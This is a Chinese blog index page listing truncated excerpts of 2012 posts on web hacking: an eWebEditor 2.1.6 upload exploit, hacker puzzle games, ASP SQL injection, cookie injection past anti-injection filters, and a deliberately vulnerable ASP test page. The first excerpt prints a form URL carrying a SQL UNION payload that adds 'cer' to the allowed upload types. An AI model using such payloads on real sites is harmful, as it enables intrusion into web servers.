摘要: <H1>ewebeditorasp版2.1.6上传漏洞利用程序----</H1><br><br><formaction="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye'unionselectS_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_Me 阅读全文
posted @ 2012-11-14 20:59 山貓 阅读(1261) 评论(0) 推荐(0) 编辑
摘要: 转载自:http://www.forece.net/post/2513.htm不知道是不是很多人像我一样,很喜欢这类黑客解谜游戏,感觉很锻炼脑子,当时黑客防线推出那款黑客游戏,有一关,我想了足足8个小时,也不觉得累。后来华夏等网站相继推出黑客游戏,我是乐此不疲。在网上也找了很多国外的黑客游戏。这里是我收集的一些黑客游戏,有网页版的,有客户端版的。对于黑客游戏,不仅仅是锻炼自己的推理能力,而且还能让自己的思维更加活泼。不过电脑小白就不要玩了。。。。。。。很可能想爆了脑袋也过不去一关。这里需要很多的知识,Java,PHP,HTML,Javascript等网页语言,另外有的游戏还需要了解程序的加壳脱 阅读全文
posted @ 2012-11-14 20:59 山貓 阅读(2314) 评论(0) 推荐(0) 编辑
摘要: SQL注入是从正常的 WWW 端口访问,而且表面看起来跟一般的 Web 页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看 IIS 日志的习惯,可能被入侵很长时间都不会发觉。 但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。 根据国情,国内的网站用 ASP+Access 或 SQLServer 的占 70% 以上,PHP+MySQ 占 20%,其他的不足 10%。在本文,我们从分入门、进阶至高级讲解一下 ASP 注入的方法及技巧,PHP 注入 阅读全文
posted @ 2012-11-14 20:57 山貓 阅读(213) 评论(0) 推荐(0) 编辑
摘要: cookie注入绕过SQL通用防注入程序ASP是按QueryString,from,cookie,servervariable,集合的顺序来搜索的,在request对象成员中集合cookies,它 的意思是"读取用户系统发送的所有cookie值,我们从第二讲关于"cookies欺骗入侵和原理"中知道,cookies是保存在客户端计算机的一个 文本文件,可以进行修改,这样一来,我们就可以使用Request.cookie方式来提交变量的值,从而利用系统的漏洞进行注入攻击.我们首先还是来看看中网景论坛的最新版本"(CNKBBS2007)中网景论坛2007v5. 阅读全文
posted @ 2012-11-14 20:53 山貓 阅读(874) 评论(0) 推荐(0) 编辑
摘要: 最近在学习mssql注入漏洞,一直找不到合适的网站系统,自己做了个有漏洞的连接数据库的代码来实验。<html><head><title>sql注入漏洞测试</title></head><body><%MM_conn_STRING = "Driver={SQL Server};server=(local);uid=sa;pwd=123;database=test;"Set conn = Server.Createobject("ADODB.Connection")conn.ope 阅读全文
posted @ 2012-11-14 15:05 山貓 阅读(362) 评论(0) 推荐(0) 编辑